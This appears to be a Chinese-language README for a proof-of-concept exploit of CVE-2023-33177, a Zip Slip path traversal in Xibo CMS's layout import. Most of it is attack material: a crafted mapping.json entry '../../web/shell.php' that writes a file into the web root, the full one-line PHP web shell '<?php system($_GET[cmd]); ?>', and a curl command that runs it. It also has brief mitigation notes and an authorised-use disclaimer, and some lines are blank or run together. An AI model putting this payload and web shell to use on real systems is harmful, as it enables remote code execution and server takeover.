该漏洞利用工具演示了 Xibo CMS(CVE-2023-33177)中的路径遍历漏洞,该漏洞可通过恶意布局文件导入实现远程代码执行。
CVE/公告: CVE-2023-33177 受影响版本:
漏洞类型: 路径遍历(Zip Slip) 影响: 远程代码执行(RCE)
Xibo CMS 允许已认证用户通过 ZIP 压缩包导入布局文件。导入功能未能正确验证 mapping.json 文件中的文件路径,攻击者可以利用路径遍历序列(../../)将文件写入预期库目录之外。
mapping.json 中注入路径遍历:使用 ../../web/shell.php 作为文件路径library/../../web/shell.php/var/www/cms/web/shell.phpZip 包含: library/../../web/shell.php
Xibo 读取: library/ + ../../web/shell.php(来自 mapping.json)
Xibo 写入: /var/www/cms/library/temp/ + ../../web/shell.php
结果: /var/www/cms/web/shell.php ← WebShell 位于 Web 根目录!
python3 create_exploit.py
该命令会创建包含恶意布局包的 exploit.zip。
xibo_admin / password)exploit.zipcurl 'http://localhost:8080/shell.php?cmd=id'
漏洞利用 ZIP 包含:
exploit.zip
├── layout.json # 有效的 Xibo 布局定义
├── playlist.json # 空播放列表(触发 JSON 导入)
├── mapping.json # 包含路径遍历载荷
└── library/
└── ../../web/
└── shell.php # PHP WebShell(被解压至 Web 根目录)
内置的 WebShell 非常简洁:
<?php system($_GET["cmd"]); ?>
通过以下地址访问:http://<target>/shell.php?cmd=<command>
已修复版本:
缓解策略:
.. 或绝对路径的路径此漏洞利用工具仅用于:
请勿将本漏洞利用工具用于非您所有或未经明确授权测试的系统。
complexusprada 2025 年 11 月